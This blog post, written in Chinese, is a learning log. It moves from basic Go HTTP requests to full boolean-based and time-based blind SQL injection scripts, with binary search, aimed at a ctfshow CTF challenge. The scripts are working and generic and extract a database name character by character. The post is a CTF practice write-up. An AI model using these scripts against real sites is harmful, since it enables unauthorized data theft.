GO的sql注入盲注脚本

之间学习了go的语法 这里就开始go的爬虫

与其说是爬虫 其实就是网站的访问如何实现 因为之前想通过go写sql注入盲注脚本

发现不是那么简单 这里开始研究一下

首先是请求网站

这里貌似很简单

package main

import (
	"fmt"
	"net/http"
)

func main() {
	res, err := http.Get("https://www.baidu.com/")
	fmt.Println(res, err)
}
&{200 OK 200 HTTP/1.1 1 1 map[Content-Type:[application/x-gzip] Date:[Thu, 14 Dec 2023 06:31:16 GMT] Server:[bfe]] 0xc0001a0020 -1 [] false true map[] 0xc000136000 0xc000118370} 

发现这里是一个地址

 然后就是读取源代码

package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
)

func main() {
	res, err := http.Get("https://www.baidu.com/")
	if err != nil {
		fmt.Println("connnect error")
		os.Exit(0)
	}
	body, err := io.ReadAll(res.Body)
	// fmt.Println(body)
	fmt.Println(string(body))
}

GO的sql注入盲注脚本_第1张图片

 这里再难一点

package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
)

func main() {
	var url string = "http://www.baidu.com/"
	download(url)

}
func download(url string) {
	client := &http.Client{} //这里是将 client作为http.clinet的结构体4
	res, _ := http.NewRequest("GET", url, nil)
	res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)") //设置hander
	resp, err := client.Do(res)
	if err != nil {
		fmt.Println("connect error")
		os.Exit(0)
	}
	defer resp.Body.Close() //取消链接 这里入栈 即 最后进行取消
	links, err := io.ReadAll(resp.Body)
	fmt.Println(string(links))
}

通过函数 然后发送请求

package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
	"strings"
)

func main() {
	var url string = "http://www.baidu.com/"
	download(url)

}
func download(url string) {
	client := &http.Client{} //这里是将 client作为http.clinet的结构体4
	res, _ := http.NewRequest("GET", url, nil)
	res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)") //设置hander
	resp, err := client.Do(res)
	if err != nil {
		fmt.Println("connect error")
		os.Exit(0)
	}
	defer resp.Body.Close() //取消链接 这里入栈 即 最后进行取消
	links, err := io.ReadAll(resp.Body)
	// fmt.Println(string(links))
	if strings.Contains(string(links), "百度一下") {
		fmt.Println("存在")
	} else {
		fmt.Println("不存在")
	}
}

然后这里开始尝试写一下盲注脚本

这里开始是bool脚本 题目是ctfshow 174

golang bool注入普通脚本

package main

import (
	"fmt"
	"io"
	"net/http"
	"net/url"
	"os"
	"strings"
)

var payload string = "1' and (ascii(substr((select database()),%v,1))=%v)-- +"
var flag string

func main() {

	var url string = "http://0b85a32b-ecd2-47f2-8883-22c57d54f0b2.challenge.ctf.show/api/v4.php?id="
	sqlin(url)
}
func sqlin(url1 string) {
	for i := 1; i < 200; i++ {
		for j := 0; j < 127; j++ {
			if j >= 50 {
				payload1 := fmt.Sprintf(payload, i, j)
				// fmt.Println(payload1)
				payload2 := url.QueryEscape(payload1)
				payload1 = url1 + payload2
				// fmt.Println(payload1)
				re := send(payload1)
				if check(re) {
					flag += string(j)
					fmt.Println(flag)
				}
			}
		}
	}
}

func send(url string) string {
	client := &http.Client{}
	res, _ := http.NewRequest("GET", url, nil)
	res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)")
	resq, err := client.Do(res)
	if err != nil {
		fmt.Println("connect error")
		os.Exit(0)
	}
	defer resq.Body.Close()
	rest, err := io.ReadAll(resq.Body)
	res1 := string(rest)
	return res1
}

func check(test string) bool {
	if strings.Contains(test, "admin") {
		return true
	} else {
		return false
	}
}

很慢哦

二分法看看如何实现

golang bool注入二分法脚本

package main

import (
	"fmt"
	"io"
	"net/http"
	"net/url"
	"os"
	"strings"
)

var payload string = "1' and (ascii(substr((select database()),%v,1))>%v)-- +"
var flag string

func main() {

	var url string = "http://0b85a32b-ecd2-47f2-8883-22c57d54f0b2.challenge.ctf.show/api/v4.php?id="
	sqlin(url)
}
func sqlin(url1 string) {
	for i := 1; i < 200; i++ {
		high := 127
		low := 37
		mid := (high + low) / 2
		// fmt.Println(mid)
		for high > low {
			payload1 := fmt.Sprintf(payload, i, mid)
			// fmt.Println(payload1)
			payload2 := url.QueryEscape(payload1)
			payload1 = url1 + payload2
			// fmt.Println(payload1)
			re := send(payload1)
			if check(re) {
				low = mid + 1
			} else {
				high = mid
			}
			// fmt.Println(low, high)
			mid = (high + low) / 2
			if string(mid) == "%" {
				os.Exit(0)
			}

		}
		flag += string(mid)
		fmt.Println(flag)
	}
}

func send(url string) string {
	client := &http.Client{}
	res, _ := http.NewRequest("GET", url, nil)
	res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)")
	resq, err := client.Do(res)
	if err != nil {
		fmt.Println("connect error")
		os.Exit(0)
	}
	defer resq.Body.Close()
	rest, err := io.ReadAll(resq.Body)
	res1 := string(rest)
	return res1
}

func check(test string) bool {
	if strings.Contains(test, "admin") {
		return true
	} else {
		return false
	}
}

能发现其实其他都是差不多的 只是修改了

if check(re) {
				low = mid + 1
			} else {
				high = mid
			}
			// fmt.Println(low, high)
			mid = (high + low) / 2
			if string(mid) == "%" {
				os.Exit(0)
			}

这一块 速度又起来了

下面想尝试一下时间注入

golang time注入二分法脚本

package main

import (
	"fmt"
	"io"
	"net/http"
	"net/url"
	"os"
	"time"
)

var payload string = "1' and if((ascii(substr((select database()),%v,1))>%v),sleep(5),0)-- +"
var flag string

func main() {

	var url string = "http://0b85a32b-ecd2-47f2-8883-22c57d54f0b2.challenge.ctf.show/api/v4.php?id="
	sqlin(url)
}
func sqlin(url1 string) {
	for i := 1; i < 200; i++ {
		high := 127
		low := 37
		mid := (high + low) / 2
		// fmt.Println(mid)
		for high > low {
			payload1 := fmt.Sprintf(payload, i, mid)
			fmt.Println(payload1)
			payload2 := url.QueryEscape(payload1)
			payload1 = url1 + payload2
			// fmt.Println(payload1)
			_, int123 := send(payload1)
			if check(int123) {
				low = mid + 1
			} else {
				high = mid
			}
			// fmt.Println(low, high)
			mid = (high + low) / 2
			if string(mid) == "%" {
				os.Exit(0)
			}

		}
		flag += string(mid)
		fmt.Println(flag)
	}
}

func send(url string) (string, int64) {
	client := &http.Client{}
	res, _ := http.NewRequest("GET", url, nil)
	res.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)")
	start := time.Now()
	resq, err := client.Do(res)
	if err != nil {
		fmt.Println("connect error")
		os.Exit(0)
	}
	defer resq.Body.Close()
	elapsed := time.Since(start).Milliseconds()
	rest, err := io.ReadAll(resq.Body)
	res1 := string(rest)

	return res1, elapsed
}

func check(test int64) bool {
	if test > 5000 {
		return true
	} else {
		return false
	}
}

这里是sql注入time的二分法但是我想进行优化

GO的sql注入盲注脚本_第2张图片

你可能感兴趣的:(golang,开发语言,后端)